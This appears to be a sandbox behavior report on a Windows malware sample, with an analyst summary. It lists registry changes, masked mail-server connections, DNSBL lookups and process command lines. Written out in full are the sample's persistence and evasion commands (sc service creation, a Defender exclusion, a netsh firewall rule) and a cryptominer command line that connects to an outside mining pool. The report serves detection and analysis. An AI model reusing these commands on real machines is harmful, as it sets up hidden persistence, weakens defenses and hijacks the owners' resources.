Technical Information

Reviewer summary (derived only from the entries listed below; hostnames stay masked as in the original report). The sample drops `%TEMP%\uzbtwrxh.exe`, moves it to `%WINDIR%\SysWOW64\meujtone\`, and registers it as an auto-start service named `meujtone` (DisplayName "wifi support", description "wifi internet conection" — the typo is in the observed command and is itself a usable hunting string; registry `Start = 2`), giving it reboot persistence. It then weakens host defenses by adding a Windows Defender path exclusion for that directory and a netsh inbound-allow rule, named to resemble a Windows component, for `%WINDIR%\SysWOW64\svchost.exe`, a path that also appears in the file list. That svchost.exe is launched with arguments consistent with XMRig-style miner syntax (`-o xmr-school.cf:2222 … -a cn/half`); the masked `xm###chool.cf:2222` in the connection list is evidently this pool, and a legitimate svchost.exe never carries `-o host:port` / `-a cn/...` arguments, which makes the command line a reliable detection pivot. The very large number of TCP/25 connections to mail exchangers, combined with lookups of a reversed IP address against DNSBL zones (SORBS, SpamCop, Spamhaus zen/sbl-xbl, CBL), is consistent with a spam-sending component that first checks whether its own address is blocklisted. The entry `%WINDIR%\syswow64\config\systemprofile:.repos` uses NTFS alternate-data-stream syntax, so disk triage should include ADS enumeration. The repeated connections to `62.##4.41.45–50` and `91.#43.33.5` on the non-standard ports 430 and 486 are not explained by the miner or the mail activity and are the most plausible command-and-control channel, though this report alone does not confirm it.
- [<HKLM>\System\CurrentControlSet\Services\meujtone] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe'
- 'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"
- 'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\meujtone' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\uzbtwrxh.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\uzbtwrxh.exe to %WINDIR%\syswow64\meujtone\uzbtwrxh.exe
- 'mi##########m.mail.protection.outlook.com':25
- 'mx.####o.locaweb.com.br':25
- 'mx####.carrierzone.com':25
- 'mx.#p.pl':25
- 'sl###.#rg.1.arsmtp.com':25
- 'ma##.#elkomsa.net':25
- 'm.###tube.com':443
- 'he#####olicy.usc.edu':443
- 'mt##.##0.yahoodns.net':25
- 'in###gram.com':443
- 'mx.##wered.name':25
- 'mx.###eric-isp.com':25
- 'sm##.#opmail.com':25
- 'ma##.poczta.pl':25
- 'mx##.mb5p.com':25
- 'mx##.###us-vadesecure.net':25
- 'sm#####.hosting.orange.pl':25
- 'it#####2.itscomp.com':25
- 'ma##.#-email.net':25
- 're###1.gse.it':25
- 'ma###.mail-vert.fr':25
- 'mx#.free.fr':25
- '31.#3.64.52':443
- 'mx#.owt.com':25
- 'mx.###zta.onet.pl':25
- 'mx.#len.pl':25
- 'ma##.#qeumco.com':25
- 'ma##.#nwiredbb.com':25
- '15#.#40.201.174':443
- 'ul######.##il.protection.outlook.com':25
- 'mx#.#mpal.com':25
- 'ma##.#upereva.it':25
- '10#.#62.165.235':443
- 'mx#.###-sd.iphmx.com':25
- 'mx#######703.gslb.pphosted.com':25
- 'mx.###-group.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'mx#.#anmail.net':25
- 'mx#######b02.gslb.pphosted.com':25
- 'ma###.eircom.net':25
- 'sk##nks.com':25
- 'sm#####x.turknet.net.tr':25
- 'ma##.#eranit.com.tr':25
- 'mx.###yamzone.com':25
- 'sm##.##cureserver.net':25
- 'gw.##odvian.com':25
- 'mx.#####.#e.cust.b.hostedemail.com':25
- 'mx#.##tsolmail.net':25
- 'mx###.mb1p.com':25
- 'mx###.##tsol.xion.oxcs.net':25
- 'na#.###.#rotection.outlook.com':25
- 'mx#######c01.gslb.pphosted.com':25
- 'cl#####6.netcore.co.in':25
- 'ma###.#orpmailsvcs.com':25
- 'mx.###cali.co.uk':25
- 'cm######1.mail.tiscali.it':25
- 'ma##.#ailerhost.net':25
- 'ws#.edu':443
- '15#.#40.201.63':443
- 'mx######-com.icoremail.net':25
- 'xm###chool.cf':2222
- 'ma###.##mebrightmail.com':25
- 'fm##ers.com':25
- 'ma##.#onglom.com':25
- 'es##.##ntas.iphmx.com':25
- 'mx.##.#tinternet.com':25
- 'mx#######e01.gslb.pphosted.com':25
- 'fw####.servlinks.com':25
- 'mx#######101.gslb.pphosted.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#######e02.gslb.pphosted.com':25
- 'mx#######a01.gslb.pphosted.com':25
- 'al######x-vip1.prodigy.net':25
- 'mx#######b01.gslb.pphosted.com':25
- 'mx#######602.gslb.pphosted.com':25
- 'fm######01.emirates.net.ae':25
- 'cc#.#pamfree.cz':25
- '_d####.####f04adb09.own-initiative.com':25
- 'mx.####gnerclosets.com':25
- 'mx######91d01.pphosted.com':25
- 'mx##.#-online.de':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'ma##.#nowroute.com':25
- 'mx##.##il.icloud.com':25
- 'aspmx.l.google.com':25
- 'un###v8.un.org':25
- '62.##4.41.45':486
- 'ni###eimr.cn':443
- 'mx#.#harter.net':25
- 'mx###.comcast.net':25
- 'mx#.#vinf.com':25
- 'po####afabrics.com':25
- 'sm###in.sfr.fr':25
- 'd1######.#ss.barracudanetworks.com':25
- 'mc######.mx.a.cloudfilter.net':25
- 'ma#####ter.fast.net.uk':25
- 'mx###.##stedmxserver.com':25
- 'mx##.mail.com':25
- 'sm###.#ail.medcity.net':25
- 'mx.#####.#om.cust.b.hostedemail.com':25
- 'google.com':80
- '62.##4.41.49':430
- '62.##4.41.50':430
- '91.#43.33.5':430
- '62.##4.41.48':430
- '62.##4.41.47':430
- '62.##4.41.46':430
- 'pu######1.mail2world.com':25
- 'mx.##teria.pl':25
- 'ma###esia.com':25
- 'mx.####oupecuador.com':25
- 'em##.freenet.de':25
- 'sm###.#rvatskamail.com':25
- 'mx.###l-data.net':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx#.#eznam.cz':25
- 'gl####nsecurity.com':25
- 'ma###.#ailinator.com':25
- 'in#######.exchangedefender.com':25
- 'mx.##a.untd.com':25
- 'i7##.###lsecurity-nec.jp':25
- http://www.google.com/
- 'ni###eimr.cn':443
- 'gl####nsecurity.com':25
- 'm.###tube.com':443
- 'fm##ers.com':25
- 'he#####olicy.usc.edu':443
- 'mt##.##0.yahoodns.net':25
- 'mx####.carrierzone.com':25
- 'in###gram.com':443
- 'ma##.poczta.pl':25
- 'sm##.#opmail.com':25
- '_d####.####f04adb09.own-initiative.com':25
- 'it#####2.itscomp.com':25
- 'al######x-vip1.prodigy.net':25
- 'ma##.#-email.net':25
- 'mx.###eric-isp.com':25
- '91.#43.33.5':430
- 'po####afabrics.com':25
- 'mx#.#anmail.net':25
- 'gw.##odvian.com':25
- 'sm#####x.turknet.net.tr':25
- 'alt1.aspmx.l.google.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx#.##tsolmail.net':25
- 're###1.gse.it':25
- 'sl###.#rg.1.arsmtp.com':25
- 'cd#.#eb.wsu.edu':443
- 'cm######1.mail.tiscali.it':25
- 'ws#.edu':443
- '15#.#40.201.63':443
- 'ul######.##il.protection.outlook.com':25
- '15#.#40.201.174':443
- 'cl#####6.netcore.co.in':25
- 'xm###chool.cf':2222
- 'mx#.owt.com':25
- '31.#3.64.52':443
- 'mx.###zta.onet.pl':25
- 'mx#######b01.gslb.pphosted.com':25
- '62.##4.41.45':486
- 'aspmx.l.google.com':25
- 'ma##.#nowroute.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#######a01.gslb.pphosted.com':25
- 'mx#.###-sd.iphmx.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx#.#eznam.cz':25
- 'fw####.servlinks.com':25
- 'ma##.#onglom.com':25
- 'es##.##ntas.iphmx.com':25
- 'in#######.exchangedefender.com':25
- 'ma###.#ailinator.com':25
- 'mx.##.#tinternet.com':25
- 'na#.###.#rotection.outlook.com':25
- 'sm###.#rvatskamail.com':25
- 'pu######1.mail2world.com':25
- 'mx.##teria.pl':25
- 'ma##.#nwiredbb.com':25
- 'mx######-com.icoremail.net':25
- 'ma###.##mebrightmail.com':25
- 'ma#####ter.fast.net.uk':25
- 'mx#.#vinf.com':25
- 'ma###esia.com':25
- 'mx###.##stedmxserver.com':25
- 'mx.###l-data.net':25
- '62.##4.41.49':430
- '62.##4.41.50':430
- '62.##4.41.48':430
- '62.##4.41.47':430
- '62.##4.41.46':430
- 'd1######.#ss.barracudanetworks.com':25
- '10#.#62.165.235':443
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK mx.###eric-isp.com
- DNS ASK ro###tmail.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ne####essman.com
- DNS ASK mx.##wered.name
- DNS ASK in###gram.com
- DNS ASK ju###fou.com
- DNS ASK he#####olicy.usc.edu
- DNS ASK m.###tube.com
- DNS ASK li###pand.org
- DNS ASK te###msa.net
- DNS ASK ma##.#elkomsa.net
- DNS ASK vp.pl
- DNS ASK sl##c.org
- DNS ASK wp.pl
- DNS ASK mx.#p.pl
- DNS ASK nt##os.net
- DNS ASK mx####.carrierzone.com
- DNS ASK gl##o.com
- DNS ASK mx.####o.locaweb.com.br
- DNS ASK xm###chool.cf
- DNS ASK ul##h.ca
- DNS ASK ul######.##il.protection.outlook.com
- DNS ASK fr##mail.it
- DNS ASK ma##.#upereva.it
- DNS ASK po###a.onet.pl
- DNS ASK sm##.#opmail.com
- DNS ASK vi###mail.com
- DNS ASK sl###.#rg.1.arsmtp.com
- DNS ASK ws#.edu
- DNS ASK po##ta.pl
- DNS ASK o2.pl
- DNS ASK mx.#len.pl
- DNS ASK on#t.pl
- DNS ASK mx.###zta.onet.pl
- DNS ASK cr####oleman.com
- DNS ASK mx#.owt.com
- DNS ASK on##ne.fr
- DNS ASK mx#.free.fr
- DNS ASK op.pl
- DNS ASK or##ga.fr
- DNS ASK ma###.mail-vert.fr
- DNS ASK gs#.it
- DNS ASK re###1.gse.it
- DNS ASK gm##ln.com
- DNS ASK ma##.#-email.net
- DNS ASK ma###agent.com
- DNS ASK it##omp.com
- DNS ASK it#####2.itscomp.com
- DNS ASK or##ge.pl
- DNS ASK sm#####.hosting.orange.pl
- DNS ASK pe###epc.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK ti##jo.com
- DNS ASK ho##ail.com
- DNS ASK mx##.mb5p.com
- DNS ASK ma##.poczta.pl
- DNS ASK no#s.fr
- DNS ASK yo##ail.com
- DNS ASK mx#.#eznam.cz
- DNS ASK cp#.org
- DNS ASK mx.###yamzone.com
- DNS ASK se##nit.com
- DNS ASK ma##.#eranit.com.tr
- DNS ASK sh#####evelopers.com
- DNS ASK tu##.net
- DNS ASK sm#####x.turknet.net.tr
- DNS ASK sk##nks.com
- DNS ASK ei##om.net
- DNS ASK ma###.eircom.net
- DNS ASK ta##et.com
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK le#.com
- DNS ASK ha##ail.net
- DNS ASK ma##.#ailerhost.net
- DNS ASK mx#.#anmail.net
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK wa###roup.com
- DNS ASK mx.###-group.com
- DNS ASK gh#.org
- DNS ASK mx#######703.gslb.pphosted.com
- DNS ASK sy##hes.com
- DNS ASK mx#.###-sd.iphmx.com
- DNS ASK ai##z.co.nz
- DNS ASK ts###ha.co.jp
- DNS ASK i7##.###lsecurity-nec.jp
- DNS ASK em##l.com
- DNS ASK sa###mzone.com
- DNS ASK sm##.##cureserver.net
- DNS ASK sh####travel.com
- DNS ASK sa#####rivastava.com
- DNS ASK it###ogroup.com
- DNS ASK cd#.#eb.wsu.edu
- DNS ASK cm######1.mail.tiscali.it
- DNS ASK ti###li.co.uk
- DNS ASK mx.###cali.co.uk
- DNS ASK pr#####sive-medical.com
- DNS ASK ma###.#orpmailsvcs.com
- DNS ASK ra####studio.com
- DNS ASK ra##ik.net
- DNS ASK cl#####6.netcore.co.in
- DNS ASK dw#.co.uk
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK wi###wslive.com
- DNS ASK ma##.#qeumco.com
- DNS ASK na#.###.#rotection.outlook.com
- DNS ASK nu###icable.fr
- DNS ASK mx###.##tsol.xion.oxcs.net
- DNS ASK mx###.mb1p.com
- DNS ASK gt##inc.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK ha##sco.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK ly##s.de
- DNS ASK mx.#####.#e.cust.b.hostedemail.com
- DNS ASK ho###ian.com
- DNS ASK gw.##odvian.com
- DNS ASK sa###mjain.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK ra###oup.com
- DNS ASK ka###ail.com
- DNS ASK sa###m.co.uk
- DNS ASK eq##mco.com
- DNS ASK ma##.#nwiredbb.com
- DNS ASK le###renet.com
- DNS ASK ei#.ae
- DNS ASK fm######01.emirates.net.ae
- DNS ASK e-##s.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK do##app.in
- DNS ASK at#.net
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK ca###ianbct.com
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK cn#.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK ro##rs.com
- DNS ASK mx#######.mail.am0.yahoodns.net
- DNS ASK fe##ish.com
- DNS ASK cb#.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK fi###ambank.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK ch##tva.com
- DNS ASK fw####.servlinks.com
- DNS ASK bt###ernet.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK ci##as.com
- DNS ASK os##.net
- DNS ASK at##s.cz
- DNS ASK mx#######602.gslb.pphosted.com
- DNS ASK cc#.#pamfree.cz
- DNS ASK _d####.####f04adb09.own-initiative.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK un.org
- DNS ASK un###v8.un.org
- DNS ASK ou####eindia.com
- DNS ASK aspmx.l.google.com
- DNS ASK ic##ud.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK dj####entific.com
- DNS ASK es##.##ntas.iphmx.com
- DNS ASK mx#.#mpal.com
- DNS ASK ma##.#nowroute.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK ve##ion.net
- DNS ASK sl#.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK be###outh.com
- DNS ASK mx######91d01.pphosted.com
- DNS ASK de####erclosets.com
- DNS ASK mx.####gnerclosets.com
- DNS ASK da###lhai.com
- DNS ASK ow####itiative.com
- DNS ASK ni###eimr.cn
- DNS ASK am###trade.com
- DNS ASK ae#.com
- DNS ASK co###cola.com
- DNS ASK ma##.#onglom.com
- DNS ASK ly##s.com
- DNS ASK mx.#####.#om.cust.b.hostedemail.com
- DNS ASK hc####lthcare.com
- DNS ASK sm###.#ail.medcity.net
- DNS ASK ma##.com
- DNS ASK mx##.mail.com
- DNS ASK re####-for-kids.com
- DNS ASK mx###.##stedmxserver.com
- DNS ASK fa###et.co.uk
- DNS ASK ma#####ter.fast.net.uk
- DNS ASK mc##i.com
- DNS ASK pg.com
- DNS ASK mc######.mx.a.cloudfilter.net
- DNS ASK d1######.#ss.barracudanetworks.com
- DNS ASK mo###onet.fr
- DNS ASK sm###in.sfr.fr
- DNS ASK iv##f.com
- DNS ASK mx#.#vinf.com
- DNS ASK ne###ape.net
- DNS ASK ne##ero.com
- DNS ASK mx.##a.untd.com
- DNS ASK de##ja.com
- DNS ASK ma###.##mebrightmail.com
- DNS ASK ch##a.com
- DNS ASK mx######-com.icoremail.net
- DNS ASK in##ria.pl
- DNS ASK fr####erpower.com
- DNS ASK em##l.cz
- DNS ASK google.com
- DNS ASK pu######1.mail2world.com
- DNS ASK ma###todd.com
- DNS ASK ch##ter.net
- DNS ASK mx#.#harter.net
- DNS ASK pl#.net
- DNS ASK po####afabrics.com
- DNS ASK co##ast.net
- DNS ASK mx###.comcast.net
- DNS ASK co###ctapps.com
- DNS ASK in#######.exchangedefender.com
- DNS ASK gl####nsecurity.com
- DNS ASK ma###nator.com
- DNS ASK ma###.#ailinator.com
- DNS ASK fm##ers.com
- DNS ASK se##am.cz
- DNS ASK co###y.edu.co
- DNS ASK co#.net
- DNS ASK pa###lly.com
- DNS ASK mx.###l-data.net
- DNS ASK hr####kamail.com
- DNS ASK sm###.#rvatskamail.com
- DNS ASK ex##te.com
- DNS ASK fr##net.de
- DNS ASK em##.freenet.de
- DNS ASK ac####pecuador.com
- DNS ASK mx.####oupecuador.com
- DNS ASK ma###esia.com
- DNS ASK in##ria.eu
- DNS ASK co##lom.com
- DNS ASK mx.##teria.pl
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK se###u-inc.com
- '%WINDIR%\syswow64\meujtone\uzbtwrxh.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start meujtone' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\
- '%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start meujtone
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o xmr-school.cf:2222 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+50000 -p x -k -a cn/half